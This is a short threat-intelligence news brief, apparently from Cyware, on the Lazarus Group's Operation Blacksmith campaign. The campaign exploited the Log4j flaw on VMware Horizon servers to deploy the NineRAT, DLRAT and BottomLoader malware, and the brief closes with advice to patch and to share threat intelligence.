Go to listing page

Operation Blacksmith: Lazarus Group Exploits Log4j Flaws to Deploy RATs

Operation Blacksmith: Lazarus Group Exploits Log4j Flaws to Deploy RATs
The North Korea-linked threat group Lazarus has been attributed to a new global campaign that exploits the infamous Log4j flaw to deploy three previously undocumented DLang-based malware - NineRAT, DLRAT, and BottomLoader.

The campaign, dubbed Operation Blacksmith, is believed to have been active since March, targeting organizations in the manufacturing, agriculture, and physical security sectors.

A glance at the infection process

The initial access begins with the successful exploitation of the Log4j vulnerability (CVE-2021-44228) on publicly facing VMWare Horizon servers. 
  • Once the initial reconnaissance has been completed, the attackers deploy the HazyLoad proxy tool to establish a foothold on the infected systems. 
  • HazyLoad is downloaded and executed utilizing another malware called BottomLoader.
  • In certain instances, researchers observed the threat actors using a new remote IP address instead of HazyLoad for communication. 
  • Upon gaining access to systems, they create an additional user account to gain administrative privileges and deploy NineRAT in the final stage to collect system information and other sensitive details.
  • The campaign has also been observed delivering DLRAT to deploy additional malware, retrieve commands from the C2, and execute them on the compromised systems.

More about NineRAT

  • Initially built around May 2022, NineRAT was first used in this campaign in March to target a South American agricultural organization. 
  • Later in September, the malware was used against a manufacturing entity in Europe.
  • NineRAT uses Telegram as its C2 channel to receive commands to gather system information, communicate its output, and even uninstall and upgrade itself.

It is worth noting that the group has been increasingly using non-traditional frameworks to add new malware families to its arsenal. Previously, the group was attributed to MagicRAT and QuiteRAT malware, built on QtFramework.

Conclusion

The wide exploitation of the Log4j flaw even after a year is a stark reminder for organizations to apply security patches. Moreover, as Lazarus continues to update its malicious arsenal with new capabilities, organizations are suggested to engage with threat intel sharing platforms to stay ahead of the curve in protecting systems.
Cyware Publisher

Publisher

Cyware